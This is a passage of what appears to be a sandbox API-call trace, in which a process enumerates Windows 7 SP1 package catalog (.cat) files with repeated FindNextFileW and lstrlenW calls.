lstrlenW (lpString="Microsoft-Windows-Anytime-Upgrade-Results-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 92 [0025.944] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x64884b99, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x64884b99, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x180700, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x306c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Backup-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MIA8CF~1.CAT")) returned 1 [0025.944] lstrlenW (lpString="Microsoft-Windows-Backup-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 80 [0025.944] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x2e2f0078, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x2e2f0078, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xbd9afe00, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x60fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Backup-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIF331~1.CAT")) returned 1 [0025.944] lstrlenW (lpString="Microsoft-Windows-Backup-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 75 [0025.944] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x64bca9e0, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x64bca9e0, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xbb40a000, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x2bcc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-BLB-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI0209~1.CAT")) returned 1 [0025.944] lstrlenW (lpString="Microsoft-Windows-BLB-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 84 [0025.944] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x342733e8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x342733e8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xc12e8500, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x4d91, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-BLB-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI1FC1~1.CAT")) returned 1 [0025.944] lstrlenW (lpString="Microsoft-Windows-BLB-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 79 [0025.944] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x58507b71, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x58507b71, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa82dd000, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x24e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Branding-Professional-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MIC93D~1.CAT")) returned 1 [0025.944] lstrlenW (lpString="Microsoft-Windows-Branding-Professional-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 102 [0025.944] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x3ea1e2bd, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x3ea1e2bd, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x41ed8100, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x5474, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Branding-Professional-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI8EF9~1.CAT")) returned 1 [0025.944] lstrlenW (lpString="Microsoft-Windows-Branding-Professional-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 97 [0025.944] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x58423330, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x58423330, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb67bec00, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x2172, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Branding-Ultimate-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI1A80~1.CAT")) returned 1 [0025.944] lstrlenW (lpString="Microsoft-Windows-Branding-Ultimate-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 98 [0025.944] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x413a02a9, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x413a02a9, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x516cca00, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x5474, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Branding-Ultimate-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI4C0D~1.CAT")) returned 1 [0025.944] lstrlenW (lpString="Microsoft-Windows-Branding-Ultimate-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 93 [0025.944] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5f68b563, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x5f68b563, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x56397a00, ftLastWriteTime.dwHighDateTime=0x1cb88fa, nFileSizeHigh=0x0, nFileSizeLow=0x350c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-BusinessScanning-Feature-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MICA05~1.CAT")) returned 1 [0025.944] lstrlenW (lpString="Microsoft-Windows-BusinessScanning-Feature-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 98 [0025.944] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x33724b53, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x33724b53, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x516cca00, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x4ab2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-BusinessScanning-Feature-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI3285~1.CAT")) returned 1 [0025.944] lstrlenW (lpString="Microsoft-Windows-BusinessScanning-Feature-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 93 [0025.944] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5560489b, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x5560489b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x14a8cf00, ftLastWriteTime.dwHighDateTime=0x1cb88fa, nFileSizeHigh=0x0, nFileSizeLow=0x22f5d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MIA162~1.CAT")) returned 1 [0025.944] lstrlenW (lpString="Microsoft-Windows-Client-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 88 [0025.945] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x33286e5, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x33286e5, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x14a0d300, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x9b12a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI5C68~1.CAT")) returned 1 [0025.945] lstrlenW (lpString="Microsoft-Windows-Client-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 83 [0025.945] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5dfa2178, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x5dfa2178, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x170b2900, ftLastWriteTime.dwHighDateTime=0x1cb88fa, nFileSizeHigh=0x0, nFileSizeLow=0x6901f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI1B4B~1.CAT")) returned 1 [0025.945] lstrlenW (lpString="Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 89 [0025.945] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x1bebf1de, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x1bebf1de, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x15d20000, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0xd62d1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI5116~1.CAT")) returned 1 [0025.945] lstrlenW (lpString="Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 84 [0025.945] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x4257a7ca, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x4257a7ca, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x92b8a600, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x1ce2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-LanguagePack-Package-wrapper~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI928B~1.CAT")) returned 1 [0025.945] lstrlenW (lpString="Microsoft-Windows-Client-LanguagePack-Package-wrapper~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 101 [0025.945] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x42612d4b, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x42612d4b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x32296900, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x1ce2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-LanguagePack-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MICFFA~1.CAT")) returned 1 [0025.945] lstrlenW (lpString="Microsoft-Windows-Client-LanguagePack-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 93 [0025.945] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5039036, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x5039036, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x6c950500, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x1ce2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-Refresh-LanguagePack-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MID6B3~1.CAT")) returned 1 [0025.945] lstrlenW (lpString="Microsoft-Windows-Client-Refresh-LanguagePack-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 101 [0025.945] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x56cc7b25, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x56cc7b25, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xba0f7300, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x2836, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-Wired-Network-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI2A57~1.CAT")) returned 1 [0025.945] lstrlenW (lpString="Microsoft-Windows-Client-Wired-Network-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 102 [0025.945] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x60faeba, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x60faeba, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x110d4c00, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x284e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-Wired-Network-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIE8C6~1.CAT")) returned 1 [0025.945] lstrlenW (lpString="Microsoft-Windows-Client-Wired-Network-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 97 [0025.945] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x641146cc, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x641146cc, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x276ed400, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x2172, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-ClipsInTheLibrary-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MICA07~1.CAT")) returned 1 [0025.945] lstrlenW (lpString="Microsoft-Windows-ClipsInTheLibrary-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 91 [0025.945] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x2c9f194a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x2c9f194a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xae1bb500, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x2846, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-ClipsInTheLibrary-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI5A20~1.CAT")) returned 1 [0025.946] lstrlenW (lpString="Microsoft-Windows-ClipsInTheLibrary-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 86 [0025.946] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x3a0c5c56, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x3a0c5c56, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xba077700, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x3288, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-CodecPack-Basic-Encoder-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIE32A~1.CAT")) returned 1 [0025.946] lstrlenW (lpString="Microsoft-Windows-CodecPack-Basic-Encoder-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 92 [0025.946] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x420457a0, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x420457a0, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x3f05d00, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x1ce2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-CodecPack-Basic-Package-wrapper~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIB8B4~1.CAT")) returned 1 [0025.946] lstrlenW (lpString="Microsoft-Windows-CodecPack-Basic-Package-wrapper~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 92 [0025.946] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5e06085a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x5e06085a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xc03c900, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x23be, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-CodecPack-Basic-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MIC384~1.CAT")) returned 1 [0025.946] lstrlenW (lpString="Microsoft-Windows-CodecPack-Basic-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 89 [0025.946] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x39f6eff3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x39f6eff3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x3f05d00, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0xe621, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-CodecPack-Basic-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIC5BA~1.CAT")) returned 1 [0025.946] lstrlenW (lpString="Microsoft-Windows-CodecPack-Basic-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 84 [0025.946] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x567dedbc, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x567dedbc, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x145c0400, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x19ad9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Common-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MIE7EE~1.CAT")) returned 1 [0025.946] lstrlenW (lpString="Microsoft-Windows-Common-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 88 [0025.946] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x47b04cb, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x47b04cb, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x516cca00, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x2209b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Common-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI24C9~1.CAT")) returned 1 [0025.946] lstrlenW (lpString="Microsoft-Windows-Common-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 83 [0025.946] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x56c55704, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x56c55704, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x47eb5e00, ftLastWriteTime.dwHighDateTime=0x1cb88fa, nFileSizeHigh=0x0, nFileSizeLow=0x5a4e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Common-Modem-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI4862~1.CAT")) returned 1 [0025.946] lstrlenW (lpString="Microsoft-Windows-Common-Modem-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 94 [0025.946] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6062939, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x6062939, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb673f000, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x1a933, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Common-Modem-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIC1F3~1.CAT")) returned 1 [0025.946] lstrlenW (lpString="Microsoft-Windows-Common-Modem-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 89 [0025.946] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x33b02f1a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x33b02f1a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xacea8800, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x2172, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-DesktopWindowManager-uDWM-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIDC5E~1.CAT")) returned 1 [0025.946] lstrlenW (lpString="Microsoft-Windows-DesktopWindowManager-uDWM-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 94 [0025.946] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x709542fd, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x709542fd, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9c420e00, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x23be, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Disk-Diagnosis-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI884F~1.CAT")) returned 1 [0025.946] lstrlenW (lpString="Microsoft-Windows-Disk-Diagnosis-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 88 [0025.946] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x33bc15fc, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x33bc15fc, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa4924d00, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x2602, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Disk-Diagnosis-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI5892~1.CAT")) returned 1 [0025.946] lstrlenW (lpString="Microsoft-Windows-Disk-Diagnosis-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 83 [0025.947] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x348ff074, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x348ff074, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x123e7900, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x2cbe, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Editions-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIC479~1.CAT")) returned 1 [0025.947] lstrlenW (lpString="Microsoft-Windows-Editions-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 84 [0025.947] FindNextFileW (in: hFindFile=0x5da1b8, 